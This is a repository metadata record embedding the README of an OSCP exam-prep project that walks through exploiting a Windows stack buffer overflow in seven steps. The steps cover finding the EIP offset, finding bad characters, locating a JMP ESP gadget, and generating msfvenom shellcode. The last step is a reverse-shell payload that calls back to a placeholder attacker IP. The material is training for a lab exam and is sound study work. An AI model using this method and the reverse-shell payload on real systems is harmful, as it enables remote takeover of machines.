{"id":13510854,"url":"https://github.com/3isenHeiM/OSCP-BoF","last_synced_at":"2025-03-30T17:31:31.043Z","repository":{"id":48663484,"uuid":"331962513","full_name":"3isenHeiM/OSCP-BoF","owner":"3isenHeiM","description":"This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.","archived":false,"fork":false,"pushed_at":"2021-07-15T08:31:07.000Z","size":49,"stargazers_count":64,"open_issues_count":0,"forks_count":30,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-30T12:22:26.909Z","etag":null,"topics":["buffer-overflow","oscp","oscp-prep","oscp-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/3isenHeiM.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-22T14:01:23.000Z","updated_at":"2025-03-27T07:06:28.000Z","dependencies_parsed_at":"2022-09-13T20:52:59.525Z","dependency_job_id":null,"html_url":"https://github.com/3isenHeiM/OSCP-BoF","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3isenHeiM%2FOSCP-BoF/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/3isenHeiM","download_url":"https://codeload.github.com/3isenHeiM/OSCP-BoF/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246355392,"owners_count":20763990,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["buffer-overflow","oscp","oscp-prep","oscp-tools"],"created_at":"2024-08-01T02:01:56.620Z","updated_at":"2025-03-30T17:31:31.032Z","avatar_url":"https://github.com/3isenHeiM.png","language":"Python","funding_links":[],"categories":["Python","others"],"sub_categories":[],"readme":"# Buffer Overflow methodology\n\n![GitHub Repo stars](https://img.shields.io/github/stars/3isenHeiM/OSCP-BoF?style=social) [![GitHub last commit (branch)](https://img.shields.io/github/last-commit/3isenHeiM/OSCP-BoF/master)](https://github.com/3isenHeiM/OSCP-BoF/commits) ![GitHub](https://img.shields.io/github/license/3isenHeiM/OSCP-BoF)\n\n\n[![Python 3](https://img.shields.io/badge/python-3-blue.svg?logo=python\u0026logoColor=white)](https://www.python.org/downloads/release/python-3/) ![GitHub Workflow Status](https://img.shields.io/github/workflow/status/3isenHeiM/OSCP-BoF/Linting)\n\n\n\n\n\n[![Twitter Follow](https://img.shields.io/twitter/follow/3isenHeiM?style=social)](https://twitter.com/3isenHeiM)\n\n\n## Introduction\n\nThese are 7 simple python scripts and a methodology **to ease** (not *automate* !) the exploitation.\nEach script targets a phase of the exploitation :\n\n1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)\n2. Find the EIP offset\n3. Confirm the offset\n4. Find the badchars\n5. Confirm badchars + find JMP ESP instruction\n6. Confirm code execution (pop calc)\n7. Exploit host\n\nIt's based on the [do stack buffer overflow good](https://github.com/justinsteven/dostackbufferoverflowgood)\" project (BTW, it's awesomely explained).\n\n## How to use\n\nFollow each step and you'll be able to craft a working example of a BoF exploitation.\n\nAll the specific variable are stored in [1 single resource file](PARAMETERS.py),\nto avoid any confusion during the exam.\n\nAfter each step, fill the proper variables with values found and they'll be re-used for the next step\n\nNote: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the \"vulnapp.exe\" application should be restarted, and Attach and Run should be done on Immunity Debugger.\n\n## 0. Pre-start\n\nFill in the following variables in the [resource file](PARAMETERS.py) depending on the host to attack :\n * ``RHOST`` : the IP address of the host\n * ``RPORT`` : the port on which to access the application to exploit\n\n## 1. Segmentation fault : [1_segfault.py](1_segfault.py)\n\nSend enough length string for victim system crash.\n\nPlease note that the total length to input is often given in the exmaple they\nprovide in the exam.\n\nNote the offeset in ``PARAMETERS.py``, in the variable ``offset_eip``.\n\n## 2. Find the offset : [2_find_offset.py](2_find_offset.py)\n\nGenerate the pattern (adapt the buffer lenght) :\n\n    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l \u003cString_Length\u003e\n\n    buf += (\"\u003cPATTERN\u003e\")\n\nPut the output into the variable ``buf`` in ``2_find_offset.py`` \u0026 send it.\n\nOnce the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).\n\n\n\n\nIf needed : convert the EIP value to ASCII : echo \"\u003cEIP_value\u003e\" | xxd -r -p\n\nFind the offset at which the sequence is met in the pattern :\n\n    /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q \u003cEIP_value\u003e\n\nOr, type this in Immunity Debugger : `!mona findmsp`.\n\nNote the value of the EIP offet in the variable ``offset_eip`` in ``PARAMETERS.py``, and the value of the ESP offset in the variable ``offset_esp``.\n\n## 3. Control the EIP : [3_confirm_offset.py](3_confirm_offset.py)\n\nExecute this script as is.\n\nIn Immunity Debugger, make sure that\n   - **BBBB** in the EIP (in hex, so ``42424242``)\n   - **CCCCDDDDD.....** is written in what ESP points to\n\n## 4. Find the bad chars : [4_find_badchars.py](4_find_badchars.py)\n\nSend it to the application\n\nIn Immunity Debugger, make mona create a list of badchars :\n\n    !mona bytearray –cpb “\\x00”\n\nThe console output will tell you where it has been saved.\n\nCompare this file with the stack contents :\n\n    !mona compare -a ESP -f \u003cfile_with_bad_chars\u003e\n    !mona compare -a \u003cWHATEVER ADDRESS\u003e -f \u003cfile_with_bad_chars\u003e\n\n**Note: **always use the full path to the file !\n\nIn the mona output, ``Possibly bad chars`` are output.\nPut them in the ``badchars`` array in ``PARAMETERS.py``.\n\n## 5. Confirm badchars \u0026 find a JMP ESP instruction : [5_find_jmp_esp.py](5_find_jmp_esp.py)\n\n### a. Confirm badchars\n\nMake sure the badchars identified are mentionned in the ``PARAMETERS.py`` file.\n\nExecute the script.\n\nRe-generate a badchar sequence on mona :\n\n    !mona bytearray -cpb \"\\x00\\x04\\x05\\xA2\\xA3\\xAC\\xAD\\xC0\\xC1\\xEF\\xF0\"\n\nThe console output will tell you where it has been saved.\n\nCompare the ``bytearray.bin`` (**use the full filepath**) and the buffer to make sure they are the same.\nThat will mean that no new badchar have been detected :\n\n    !mona compare -a ESP -f \u003cfile_with_bad_chars\u003e\n    !mona compare -a \u003cWHATEVER ADDRESS\u003e -f \u003cfile_with_bad_chars\u003e\n\nThe mona output status should be ``unmodified`` and you should get a message in the\nconsole saying : ``!!! Hooray, normal shellcode unmodified !!!``\n\nThis mean that no other badchars have been detected.\n\n### b. Find a JMP ESP\n\nAsk mona to find the instruction ``JMP ESP`` that will allow the processor to execute\nwhatever we have put in the stack.\n\n    !mona jmp -r esp -cpb \"\u003cbad_chars\u003e\"       formatted like this : \"\\x00\\x01\"\n\nPut the address returned in the variable ``ptr_jmp_esp`` in ``PARAMETERS.py``\n\n\n## 6. Pop calc : [6_pop_calc.py](6_pop_calc.py)\n\nThis will confirm the code execution on the target host.\nThis can be used to validate the build-up of the exploit, and set a working basis.\n\nLaunch this to produce the shellcode that will make calc pop on the target :\n\n    msfvenom -p windows/exec -b '\u003cbadchars\u003e' -f python --var-name shellcode_calc \\\n    CMD=calc.exe EXITFUNC=thread\n\nInsert the output (python variable ``shellcode_calc``) in the script ``6_pop_calc.py``.\n\nIn the script, we will also move ESP up in the stack (instruction ``SUB ESP,0x10``)\nThis is to avoid the ESP overwrite by the encoder of the payload.\nSome guys use a NOP sled, here is a more proper way ;)\n\nLaunch the script and enjoy popping calc!\n\n## 7. Create shellcode : [7_exploit.py](7_exploit.py)\n\nNow, you can craft any other shellcode as long as you respect the badchars :\n\n    msfvenom -p windows/shell_reverse_tcp LHOST=\u003cAttacker_IP\u003e LPORT=\u003cAttacker_Port\u003e \\\n    -f py -b '\u003cbadchars\u003e' -e x86/shikata_ga_nai --var-name shellcode\n\nInsert the output (python variable ``shellcode_calc``) in the script ``7_exploit.py``.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3isenHeiM%2FOSCP-BoF","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F3isenHeiM%2FOSCP-BoF","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3isenHeiM%2FOSCP-BoF/lists"}